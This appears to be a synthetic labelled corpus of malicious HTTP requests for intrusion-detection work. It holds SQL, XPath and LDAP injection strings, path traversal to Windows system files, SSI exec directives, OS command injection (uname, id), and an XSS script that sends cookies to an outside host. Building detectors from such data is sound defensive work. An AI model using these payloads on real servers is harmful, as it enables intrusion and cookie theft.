~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41727
Start - Id: 35247
class: SqlInjection
GET /0rWM17qoptw4LOf-l/8aiec/AKOjpTe_4b/EY/5cVlVdh9FKXE/yLbehJmdN-jbWnsCY/xidtnh/oA-g0Hu/w.duIzubh/x6V5N8eB/ba3pij7ennRuExrte.jpeg?apbtrnrhtWckziO=l&SyltvnotwNapDld=sb1vU2T0hbG&m2iicwii=da&uO7t0citee=973&ma=572796&hbpindowHk=81&QDaF9bjOZE=hian&Hmjnayki=gmvuZSSU29%40&3oeyhrc0lS=bFshutdown&Fitd4=%27++++OR+%27gxs2n%27++%3C+++%27X HTTP/1.0
Host: 99.25.123.14
Connection: TholseEi
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.6, deflate, compress, gzip
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 150.203.233.233
Cookie: XSoMlEMNhc=69581;t2ernodltuout=hs;hsahinnrmpni=3660228295
Cookie2: $Version="9"
Date: Thu, 07 Jul 05 03:48:38 UTC
ETag: W/"jqRyTt_G6V.5opQIoq5"
Expect: 100-continue
From: yypu@9nadiOxX.st
If-Modified-Since: Wed, 30 Apr 08 15:57:24 CET
If-Unmodified-Since: Wed, 23 Nov 05 10:52:52 GMT
If-Match: "o64x6zlvVa_jB03.F"
If-None-Match: "Sl6Hd0k_r0nWJP42AJV@"
If-Range: Mon, 25 Jul 05 11:47:32 UTC
Max-Forwards: 1228
MIME-Version: 2.3
Pragma: rdEAa='k4eh'
Proxy-Authorization: Digest qop=auth
Authorization: NTLM QTllc3RURWF0cm9zaWVlcmRyZXd1aWx0ZXJ0NEk2UTByaXhsSGFlZXJnZWlzb3Q=
Range: 686-87074
Referer: /rhEndc.jpeg
TE: gzip;q=0.1,deflate;q=0.7,trailers
Trailer: Warning
User-Agent: ettqN8cc/7.4.2.4.9
UA-CPU: 68000
UA-Disp: 052,8339,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7374x0863
Via: HTTP/6.6 176.196.141.171, HTTP/3.7 153.192.207.115
Transfer-Encoding: yfqcxb; eikstlig=nie7
Upgrade: rtrrq0/4.2, nltst/2.4, Sic/2.9, oaewts/4.5
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 242.188.252.188
X-Serial-Number: 99658845770
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35247
Start - Id: 45217
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.1
Host: www.boe91o.biz
Connection: keep-alive
Accept: text/*;q=0.8, audio/*
Accept-Charset: *
Accept-Encoding: deflate, identity, deflate, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 115.213.88.73
Cookie: 5aameT=qsE1w&d'setn;ndcaahs=8878;xltmbEranou3=fi
Cookie2: $Version="174"
Date: Tue, 06 May 08 18:13:03 CET
ETag: "Fye-r9dja0fSKIbx"
Expect: okyem
From: 1p4rry@estl2a.org
If-Modified-Since: Tue, 21 Feb 06 05:39:31 UTC
If-Unmodified-Since: Sat, 29 Nov 08 14:37:13 UTC
If-Match: "l.vX.hJEasDfI8kBDA"
If-None-Match: *
If-Range: Fri, 07 Sep 07 22:02:20 CET
Max-Forwards: 6420
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM MXBhbmt5bmFPbm9RaWFyZ2VlYm9uanVndHRhZWlhc2VhYQ==
Range: -01750,762-,10389-0
Referer: http://efees.ch/g6ecln0/0aeeNit/ettd/iaoHaneu/6baE.js
TE: trailers,gzip
Trailer: Expect
User-Agent: Mozilla/3.4 (X11; U; Linux i586 6.5; rn-a9; rv:9.6.7) Gecko/62480404
UA-CPU: 68000
UA-Disp: 675,5988,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: 9.1 101.155.255.198, HTTP/8.1 122.92.95.183, FTP/9.5 255.181.87.102
Transfer-Encoding: lconiN
Upgrade: botOA/6.4, hiei4a/3.6, u8Qat/8.0
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 254.23.68.104
X-Serial-Number: 706890452941318
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45217
Start - Id: 41222
class: SqlInjection
GET /4FPQX2yU0Q2./aBfy0I9Fw/Aerae0eahc2naop3ettd/nW@PL0sL1OA2eKY/eps41flJ3/tpq7y9i.tiff?PPi0cmd_i8S=49816281&qleX8rf=540&asoeti0=et_&jr4esinh2=91&ynaeea=eh&ettcyetensa7cr=hopentetsho%3Don&X5libi=959&tideena3ujR=bqvU&YpuE=die&GehXJhU=scriptumtslne&tdrhoNde1p7lA=a&eaacawaonni=229&optbMfromgftp2MB7P=document1Iany&7-binyXM=%26x9h0uhcmd HTTP/1.0
Host: www.ali1hzn.ch
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis
Accept-Encoding: *
Accept-Language: aOulbtbo-qoehti;q=0.3, eoe-EUaE2h1A
Cache-Control: only-if-cached
Client-ip: 73.137.44.90
Cookie: lfu63Aemrchdy=rheT/;vbscriptU-EoNZ=ra;ntlslRHat=ceLateae0dudiv;e1tbio=1ci1hNdyre;gwyairTgEd6a=17;ioahgcN=320852
Cookie2: $Version="065"
Date: Mon, 16 Apr 07 19:48:00 UTC
ETag: W/"5ZTrgczviWtaDg7uhH"
Expect: 100-continue
From: lcrspkh@Odiotms.cz
If-Modified-Since: Mon, 10 Dec 07 18:48:41 GMT
If-Unmodified-Since: Sat, 07 Apr 07 21:45:58 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 10 Nov 04 05:46:15 GMT
Max-Forwards: 1
Pragma: no-cache
Authorization: Digest nc=e8aa0EcD
Referer: /krsrEpo/elretti/0Gt2ri/Eeo9No.css
TE: trailers,chunked,trailers
User-Agent: or     0<>(select     count(*)     from Gtrys)
UA-CPU: 68000
UA-Color: color32
Via: HTTP/8.0 70.155.117.52
Transfer-Encoding: sswaa; inpdd=ean9c
Upgrade: t4nl/2.0, rRkw/3.5, nqe/4.4
X-Serial-Number: 042702
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41222
Start - Id: 47572
class: XSS
GET /ns8qh/oq/eVS9bjZtLVcIi46F@AdH/3E9C1vSXD86gucjnDUt7.aspx?hiscEntirPbmep=o5dedWLi&hEhuttoOgIqaK=510292541&mednnurrsbiO=cri%3Es7ydtetc%3E9perl-i8y%25e&i6triedii=f2tforwisa5a&susteqrekvoh=winntwdhadivedEmtnA9O&arAnXxstu=2127&16WdIatpwA=%3C%3Cscript++%3E%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.seitgeon.com%2Fcgi-bin%2Fornetaro.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++++%3E&tugefwIIeurd=41980&S7oli=hfe4unatimbce&sTelolnzreo=022536931&GMBe=ny-NKo&htkyirxo6=0234677&ZKadminq2y@A_=8copyjbapasswdnph-%3D%25ecygroup+byro HTTP/1.1
Host: 2.25.200.25:80
Connection: gacetcr
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: thpd-oam1e, o7ujn7-Chkx;q=0.2, euoAE-t
Cache-Control: only-if-cached
Client-ip: 118.106.166.150
Cookie: eahotlmit=auo1tej;jal2et=s s  ;veinpafeothoe38=z2AnFUAM;wdn4=ehCgVNz;ZSRqIXO=i tspeYh+
Cookie2: $Version="36"
Date: Fri, 05 Mar 10 17:08:34 CET
ETag: "jT6yUuV.swlQFpy"
Expect: 100-continue
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Fri, 08 Jan 10 20:50:19 GMT
If-Unmodified-Since: Fri, 16 Jan 09 14:14:54 GMT
If-Match: "MT_hlNFibHJQceJx"
If-None-Match: *
If-Range: Mon, 08 Aug 05 05:51:09 UTC
Max-Forwards: 50
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c0k4dG55OjJFbGFo
Authorization: Basic Y08xaTpsd1R1bg==
Range: 7-,-18566
Referer: /iinaes/hmi5/asrXexv/XairG/eaik.jpeg
TE: chunked,gzip
Trailer: Accept-Language
User-Agent: Ddoale/5.0.6
UA-CPU: x86
UA-Disp: 2757,1725,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 924x017
Via: 1.3 www.celr7th.tiff, 4.3 www.oerfm.css
Transfer-Encoding: compress
Upgrade: eTere/4.3, ulLei/2.8
Warning: 084 236.106.31.192:22 "edNteueotaOrbpOeua" "Thu, 03 Jun 04 03:45:24 GMT"
X-Forwarded-For: 113.69.67.238
X-Serial-Number: 2524902769036083814
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47572
Start - Id: 47817
class: XSS
GET /ttkAhhteeiacT/l3fA.php4?ecaetti=2157&uif9ylahr=670&Hedtxrlae=1135&tre5=poq&1wxtermandSmetalY=sRspassthruuafaeno+eeo&qemxad1alco546=oJtshes&rwrcettAof=%3C%3Cscript+++%3E%5Balert+++%28%27ripowiumt%27%29%3B%5D%3C%2Fscript++++%3E&nnctssdvo=t0sit&roRcSdltscztua=oapntfbvousec6stic&flcyNesrO=r3&rn7wkrl=Tr1rr&cofg1oiyh6iDu=sreeaE5&yhdea=mgtha8k%40Nlcii9&6irl2di=1511 HTTP/1.0
Host: www.eweqhmh.org:80
Connection: keep-alive
Accept: video/*, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-age=2
Client-ip: 203.124.10.83
Cookie: jlnHmg=nescma1zrolinkue;L-1RLzMO@Y=>mo;HU0RXG@=twaeNwslhfoe
Cookie2: $Version="0"
Date: Tue, 27 Jan 04 22:05:47 UTC
ETag: W/"OurwtpibD7A0noXC"
Expect: 100-continue
From: fiAcxfzm@u71in42.ch
If-Modified-Since: Fri, 21 Dec 07 16:17:34 CET
If-Unmodified-Since: Sun, 29 Jan 06 08:00:02 CET
If-Match: *
If-None-Match: "HJvHbk2nRpGxH96nPX"
If-Range: "xax1uOCs1QxCd3aBSqM"
Max-Forwards: 629
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/g5nxxi/tLEiado/9dOtoth5/deavlru/bosadp.aspx
Authorization: Digest response="D2feD746C9Aca9aD3A9e6aACdEE572A9"
Range: 2820-37,-5180,81-
Referer: http://a9o4csT8.it/eeedtutt/Idnlrn/9aiSesUo/goome/cFil.mp3
TE: gzip;q=0.1
Trailer: TE
User-Agent: oF4-jeD http://www.rnemoos.cz
UA-CPU: x86
UA-Disp: 9028,3177,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 907x206
Via: 3.6 www.keAeda.tiff
Transfer-Encoding: identity
Upgrade: aRsepf/2.8
Warning: 325 81.170.42.32 "7FeeyLne7hiEmT" "Mon, 30 Nov 09 23:36:47 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 7313347
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47817
Start - Id: 45729
class: PathTransversal
GET /ttk63kUmbAqQkk/sep/emmva9eLpl/a3R6TJyLxJKyTb/ZPX0f4O1Wi/amdnewtDlFmTlrhki0xy/nwSkvlnPg9alzeBhkVK/uuzuCexec/67tort4lnlmbvl3/m1EEU4EFjIlTHKZ8G/eq/cBYE7pUTXhskBYzY.msf?taP=cXJoFs5MiGMM&iinO=nexec%3F&where92BbWma9SandR=k2gfda+tf%3Datt+zydz1&taala=184657081&hJ0A6zDBZ=+%27%3B47w&erdhiE=..%2F..%2F..%2FWINNT%2Fautoexec.bat&e7aswnonisv=sdiv%28ne&semecke=09C%40EMgS%40g HTTP/1.1
Host: 56.162.210.234
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 195.34.194.222
Cookie: wm=ehttps$o0
Cookie2: $Version="66"
Date: Mon, 18 Apr 05 04:22:35 GMT
ETag: W/"6TA0sUBIpgg4.xGcl"
Expect: 100-continue
From: reani1tb@daeireeubl.de
If-Modified-Since: Fri, 27 Apr 07 03:14:14 GMT
If-Unmodified-Since: Fri, 28 Dec 07 20:53:53 CET
If-Match: "zV-@oqkVqR8x0SaT1"
If-None-Match: "PDuDe4SZ2XeT@Fa8S"
If-Range: "9JyYxo0pJlBp@aMGz"
Max-Forwards: 1
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: swjmRp fzc3=EdDtese
Authorization: Basic YTF0YmdGdjpoc211dA==
Range: -500252,934-3694
Referer: /8ezcyr1/9cEet/aspz2de.bin
TE: chunked;q=0.2,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/9.7 (Windows; U; Win 9x 1.3; oe-gn; rv:8.5.1) Gecko/12132241
UA-CPU: Sparc
UA-Disp: 664,891,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 615x1457
Via: syde3/3.0 www.4daNth.gif, sbrt/9.8 www.w7ebrll.png:87811
Transfer-Encoding: identity
Upgrade: eebc/8.1, RfQc/0.5, iec/8.3
Warning: 139 123.133.191.85 "aoRovfiyaetlwhiotHa" "Tue, 27 Apr 10 21:16:33 GMT"
X-Forwarded-For: 199.93.92.127
X-Serial-Number: 1618317
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45729
Start - Id: 42003
class: SqlInjection
GET /cVKxam/h3Aroty8fhirharcyR8v/nIRc-J9FfuLy4D.cfm?BwiEr=%3B+++++insert++into+++++OPENROWSET%28+++%27SQLoledb%27%2C%27uid%3Dwzeinp6snr%3Bpwd%3D0sunmcon%3BNetwork%3DDBMSSOCN%3BAddress%3D242.126.2.51%2C1433%3B%27%2C%27select+++++*+++++from++++_sysdatabases%27%29%3B+select+++*+from+LinkedOrRemoteSrv1.master.dbo.sysdatabases&pFat=2390032845 HTTP/1.1
Host: www.eqnN.ch:32
Connection: keep-alive
Accept: image/gif;q=0.2, audio/*, application/zip;q=0.1
Accept-Charset: iso-8859-5, iso-8859-15;q=0.8, x-mac-turkish, windows-1251, x-mac-hebrew
Accept-Encoding: compress;q=0.5, gzip, compress, identity;q=0.5, identity;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 191.189.83.237
Cookie: DiDlGzY=Lsatrj2kt;ch6ogrehdo=7375
Cookie2: $Version="53"
Date: Thu, 16 Oct 08 10:10:41 GMT
ETag: "op8@lxK_60rea_5cLJ"
Expect: 100-continue
From: ainlfaqa@smAa.fr
If-Modified-Since: Thu, 18 May 06 18:00:37 GMT
If-Unmodified-Since: Mon, 31 Jan 05 04:25:35 CET
If-Match: *
If-None-Match: "I22McVCSq8vVgbGF@.aq"
If-Range: "nxO.qpAVSt.hxMU"
Max-Forwards: 539
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest uri=/oyooyi/aelsuo1/iteo/eu7usa/EDiri.cfm
Authorization: wkahnt IovcPsrh=ngos7l
Range: -728027,84041-8,736156-
Referer: http://rossr.com/gslnmnhi/dxchcss/abtuYcd.css
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/7.2 (Windows; U; Windows NT 9.3; se-mh; rv:0.4.0) Gecko/79314226
UA-CPU: StrongARM
UA-Disp: 442,012,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 0057x268
Via: 5.2 65.79.231.126
Transfer-Encoding: gzip
Upgrade: t4mmtm/8.9
Warning: 861 www.leOkisE.js "t5dd1agosNnsneae" "Sat, 17 Apr 04 02:49:48 UTC"
X-Forwarded-For: 227.242.186.30
X-Serial-Number: 772384141
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42003
Start - Id: 40316
class: SSI
GET /of2oj/luqKivaTetente/ytd4tt9hncjhAv2rrsc/nr2ephepssllem9nb/e-/YOc0z9u9Fu.jpeg?cirqKedL=%3C%21--++++%23exec+++++cmd%3D%22c%3A%5Cprogra%7E1%5Cesinoq8peh%5C8l%5Caobibfne.exe+++++d%3A%5CR1k%5Cwww.orilerti.org%5CnMd%5Cdatabase.mdb+++++%2Fx++++exporttofoxpro%22--%3E&sA=oE HTTP/1.1
Host: www.rz9O.be
Connection: close
Accept: application/postscript;q=0.6, image/jpeg, text/*
Accept-Charset: koi8, x-mac-chinesesimp, iso-8859-8-i
Accept-Encoding: 
Accept-Language: qez-yg, faUs-a, yeLoeieh-hE8arn, M-cN;q=0.8, eEcj-5;q=0.0
Cache-Control: sne=e7hae
Client-ip: 239.88.55.52
Cookie: atoaiaoe=Mpasswdranbiaulgaaccept me];9eewbpir=ein6z;3bodyBKHdZZE=8138;etnlo=6
Cookie2: $Version="373"
Date: Sat, 02 Jul 05 09:26:10 GMT
ETag: W/"BreSvbANyEzg2vf5"
Expect: uesime7x
From: rpic1ucn@6o6hir.ch
If-Modified-Since: Wed, 18 Jun 08 09:47:35 CET
If-Unmodified-Since: Mon, 16 Oct 06 19:28:22 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Dec 09 13:36:25 GMT
Max-Forwards: 0
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: intehp 4edI=sr6n1ysd
Authorization: tuinwa rtetnaLo=neheibee
Range: -2115,0045-233,-51
Referer: http://www.llegAset.gov/lrdtcr/eeateh/1ieiit/xnzfp9.avi
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: r7Ntr/5.4.5.6.9
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8587x911
Via: HTTP/5.5 156.205.173.200, 4.5 www.ntwtpo.jpeg, 5.1 205.130.212.131
Transfer-Encoding: tSeat
Upgrade: doiAa/8.2, ttps1j/4.1, hje/0.9, idg/3.2
Warning: 196 2.26.22.3:993 "ye78torehxsveoUeewSd" 
X-Forwarded-For: 232.141.193.11
X-Serial-Number: 475557970524
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40316
Start - Id: 43519
class: OsCommanding
GET /wtE/d-emMQdEFIiVGDCK/u1edooaanhes/aen0.asmx?e9ersscelsnEcU=qraa&ntztainh6=sh6dneicE&zht3plotaebaEn=503481427&oDf7h=agerot00ruaou&utEra=jdenrvh2mSzgdy&Euen=n%27&Ear3usg5StSa=3678&eeIr8injeneoed=+++++%3B++echo+++++%3B++++w+++++++%3B++++uname++++-a++++++%3B+id&a50hZ9ec6uveibd=8 HTTP/1.1
Host: 84.27.50.218
Connection: keep-alive
Accept: image/gif;q=0.9, video/*;q=0.0, audio/x-wav;q=0.9
Accept-Charset: hz-gb-2312, iso-2022-kr
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 108.184.195.217
Cookie: 1l9niero=84044827;nh1iomuelsw=5783;yelevnm44=seurleivMeutf
Cookie2: $Version="4"
Date: Thu, 23 Jul 09 02:15:42 CET
ETag: "U8-_GKPN9c8RKJvrPqX"
Expect: 100-continue
From: ioojil@heyq.net
If-Modified-Since: Thu, 16 Sep 04 22:56:01 GMT
If-Unmodified-Since: Mon, 15 Aug 05 11:40:39 GMT
If-Match: *
If-None-Match: "H4rSj8SPBuZY_weZA9"
If-Range: Tue, 01 Jun 04 19:50:49 UTC
Max-Forwards: 95
MIME-Version: 5.5
Pragma: mrt=ct2to
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM bWhoaHdtUmNzc3B0b255c2Vvb2VlY2U0aGFyMWZ0bWFoZWdib2lh
Range: 41-,-475,4948-
Referer: /eoqne/s4qd/nrr2/et9rey/nwlf0ugo.html
TE: trailers,deflate;q=0.7
Trailer: If-Unmodified-Since
User-Agent: tfjeiri (eTqEQs; eZ.Vm4.i-e; b0dDYMQC; urg1wy4; eY-Lv0rVH)
UA-CPU: PowerPC
UA-Disp: 308,529,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 473x8335
Via: FTP/6.8 www.Ihuamoh.tiff, 2.2 2.224.77.226:7866, HTTP/7.7 252.148.237.206:31710
Transfer-Encoding: rbhcon
Upgrade: suSmk/4.7, nans/0.0
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 119.116.114.21
X-Serial-Number: 61216613
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43519
Start - Id: 41662
class: SqlInjection
GET /dTCvsb8dHf4t2yEP7/eo6ajhBo1rrbeiu/uFmz6seoezn/e3ie7a4tslk.msf?Olni=775259++or+id%3E8++++or++++ls_id%3C602 HTTP/1.1
Host: 137.138.247.102
Connection: close
Accept: application/*;q=0.2
Accept-Charset: x-mac-arabic;q=0.9, iso-8859-5, windows-1258
Accept-Encoding: 
Accept-Language: nhB-4e9y;q=0.6, erns-y, ne1ua-neie, sTnfzt-mn
Cache-Control: max-stale=54
Client-ip: 239.57.78.114
Cookie: dns=5769863
Cookie2: $Version="28"
Date: Sat, 08 Sep 07 03:28:32 UTC
ETag: "FH8-9ZBlEp69RKFe"
Expect: tdqm
From: xwDNo@mseaaa.st
If-Modified-Since: Wed, 31 Mar 10 02:20:40 UTC
If-Unmodified-Since: Sat, 03 Oct 09 09:29:46 UTC
If-Match: "YyFVpGZ8f9kz2PrDZ-Z0"
If-None-Match: "JDMXO4kh0KUN@vO"
If-Range: Mon, 09 May 05 09:09:39 CET
Max-Forwards: 6348
MIME-Version: 3.1
Pragma: Ao6rrxo='qal7o8t'
Proxy-Authorization: ewnBd ycpeari1=oiYepi
Authorization: Basic dnd0cW56OnRzZGxjYThh
Range: 8646-84,-596087,4-03835
Referer: /CUwan/teQnA.asp
TE: trailers,deflate;q=0.7
Trailer: If-Range
User-Agent: Mozilla/4.5 (compatible; Konqueror/1.2; Mac OS X; tbStwhce)
UA-CPU: MIPS
UA-Disp: 4417,837,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 232x3893
Via: 4.7 www.mref.jpeg, 6.5 www.rlnm.css
Transfer-Encoding: compress
Upgrade: eelO/2.0, utnt/9.3, aSn/6.5
Warning: 530 32.109.118.103 "hOGeuun3sa018i" 
X-Forwarded-For: 236.249.18.77
X-Serial-Number: 611965021882313
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41662
Start - Id: 48651
class: XPathInjection
PUT /jV9KGmOCXm9/qeS8gblei/updated_7netcatROO6boot.iniq77style/lA11wnh6/likeoF/estasPgg/rsonSehasgpoSifwRt.js? HTTP/1.0
Content-Length: 186
Content-Language: jiftx
Content-Encoding: identity
Content-Location: http://aarnmloe.biz/ai3p/hkessn/eRicg9ic.pl
Content-MD5: ZXR0bmRlb2Jzb3RsMHNmUw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Sep 09 09:03:32 GMT
Last-Modified: Sun, 07 Mar 10 11:17:41 GMT
Host: www.snsstahc.ch
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1250;q=0.8, x-mac-turkish, iso-8859-5;q=0.7, x-mac-chinesetrad
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 188.140.113.72
Cookie: e8h=009;ygnLWe=wdxo$e=Cop
Cookie2: $Version="57"
Date: Tue, 23 Mar 04 12:09:22 UTC
ETag: "bQtfcZLDIz1no2ICu5"
Expect: shdr
From: eta3@rewxn.biz
If-Modified-Since: Tue, 27 Apr 10 22:12:08 UTC
If-Unmodified-Since: Thu, 25 Jun 09 05:27:38 GMT
If-Match: "khpo7Gi5AlpzPwYH"
If-None-Match: "fA8cmb.zXWJITyEO-nKi"
If-Range: Sun, 05 Apr 09 10:23:32 GMT
Max-Forwards: 202
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM cXRhYXRucm5EaTR0cGR2b2ZubGZlYXR5c3Vob3R0ZWlzZVJvbHMydA==
Authorization: Digest nc=FF568b5A
Range: -046912,8351-4,007308-22
Referer: /x3aoiina.cgi
TE: trailers,deflate,gzip
Trailer: If-Unmodified-Since
User-Agent: nHrecUrtaa/2.0.1
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: FTP/9.8 171.243.31.230
Transfer-Encoding: compress
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 958 171.58.48.221:65022 "tbsyeeovlI4la7he" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 2534410035139389
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

airh7Fov5btlse=-AsoFb4sia Nn&ftworpsrus=191066&mNRs=28&K-a.MhttpsiQaH2=endw'     or   5o/Bi/child::node()[processing-instruction()=9]   or     'tsajee0'='

End - Id: 48651
Start - Id: 40211
class: SSI
PUT /rfXI/ek7VPTHh0aFxp__vRr/fseeerEtMTslenrnt/3h@fzHc/uTxml/hEx@xI9T-h4l/syoio6ganw/tOto7iRleGrc/wL/c7yIn/mot6a4i/r.09Z@5mSh-Sz5u0.js? HTTP/1.1
Content-Length: 96
Content-Language: pntapjS,pdae
Content-Encoding: deflate
Content-Location: http://I87avm.uk/ega0/gtuts.php4
Content-MD5: ZmhkaGVhc1R1aWVtc2doUw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 30 Nov 08 18:48:54 UTC
Last-Modified: Thu, 24 Jul 08 03:25:51 UTC
Host: www.Tfduce.cz
Connection: close
Accept: video/quicktime, video/*, video/*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: do-2yH8, oheeslee-nTiozo, inossD-or8b;q=0.0
Cache-Control: no-store
Client-ip: 140.252.205.166
Cookie2: $Version="2"
Date: Sun, 07 May 06 18:22:37 UTC
If-Modified-Since: Sat, 02 Feb 08 09:58:25 GMT
If-None-Match: *
If-Range: "M0c41aG4BW.wpPCQTc"
Max-Forwards: 918
Pragma: no-cache
Authorization: NTLM dGRpaTJtZGNhYW5hcGQ4dFJhVHV3MGRQd3Jlb3puOXBzQ2V2dkMyaTNjM2MzZkl0
Range: 93967-,-35178,-4
Referer: http://www.cqdgtRy.biz/al4yas/erst0bo.shtml
User-Agent: <!  #<!--     #exec cmd="id"-->
UA-OS: Windows 95
Transfer-Encoding: mdnD; hee4=rgn0gar
X-Serial-Number: 58060557161

TenbI7l=pdangW&rgte=euuaye;f&e2to4Ioht6hohz=31912623&hr5W7N7=theyrtMsegh 2&sels7eore0R=ccemrqt

End - Id: 40211
Start - Id: 36190
class: PathTransversal
POST /dj8-qjDH/vttbdnttclnEso3mpa7/Muf/ncpslk/auh/n4/Od_JnBGE9BformDVO/sdtPRD.tiff? HTTP/1.0
Content-Length: 268
Content-Language: eomnm,yomTeao,mnttwpse
Content-Encoding: identity
Content-Location: http://www.y9ua.st/d4risep/eelqeeoo/qefut/heLsrear/Reida4p1.jsp
Content-MD5: NGExbmFwZjllb3NkbGh4YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 May 06 08:36:09 UTC
Last-Modified: Mon, 10 Aug 09 04:24:06 CET
Host: www.Oefgnoe.it
Connection: keep-alive
Accept: video/*;q=0.2, image/*, application/x-tar
Accept-Charset: x-mac-korean;q=0.0, euc-jp, iso-2022-jp;q=0.2
Accept-Encoding: \WINDOWS\system.ini
Accept-Language: t-ehrneo;q=0.4, iU-ded, ibuc-eelhoC, uudte00-a6ic;q=0.2
Cache-Control: rX='sadfgio'
Client-ip: 196.9.89.103
Cookie: 3escsiedde4o2ri=-hb?isyar=boot.iniei%h;naziCitsp=m;aAeoes=7nnn'lerdfrom
Date: Sat, 25 Jul 09 07:56:05 GMT
ETag: "eGwBaRA24wjBRT_nUC"
Expect: 100-continue
From: 5uhy@ih5iar.uk
If-Modified-Since: Sat, 10 Jan 09 03:44:30 GMT
If-Unmodified-Since: Thu, 17 Sep 09 17:57:19 UTC
If-Match: "dFuRUE9IJL_ONJZO71"
If-None-Match: *
If-Range: *
Max-Forwards: 8555
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: emiius i5ge=rTmnwt
Authorization: fs3mas yynattw=lroh
Referer: http://ghtei.be/bMsawi2t.exe
TE: trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: 0jc8e/1.7
UA-Disp: 768,587,16
UA-Pixels: 874x514
Via: 1.4 69.124.243.192, jkvegi/7.1 www.emtnn.jpg:5, 0.3 www.iHesn.jpeg:128
Transfer-Encoding: identity
Upgrade: sn8ar/0.2, sdt/9.0
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

havingzpdeletepgSVformPo=EluppgaerhueO&ufeieeibCtk=i ebinlp&8sq11tisnsf=65&4AoenarotcbTay=copyadminpasswdesskt09&havingO34RV=/&E]infyw&1rea=tmaai|so &testsiinphiwyj=eiyos Rhec&Rehsta2tonutsei=egr&M9D_D=a]&ubnaser=58354&nanh1pcgwseoyl=2&Eeahssanflga=ifZKIGFek

End - Id: 36190
Start - Id: 38298
class: LdapInjection
GET /1gcngu3/eCRyQ/t.tSjGroU/Nseuxxp_AURKz6documentusrY/mt/s4swPguFH-/jtd6atalosh5eycriah/tt@A4tGu8lFJ2r5/ceenejie.cgi?idael9egriAeco=oj4hm&usu=2&fZFYJ=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: 252.220.172.179:5
Connection: thsouisA
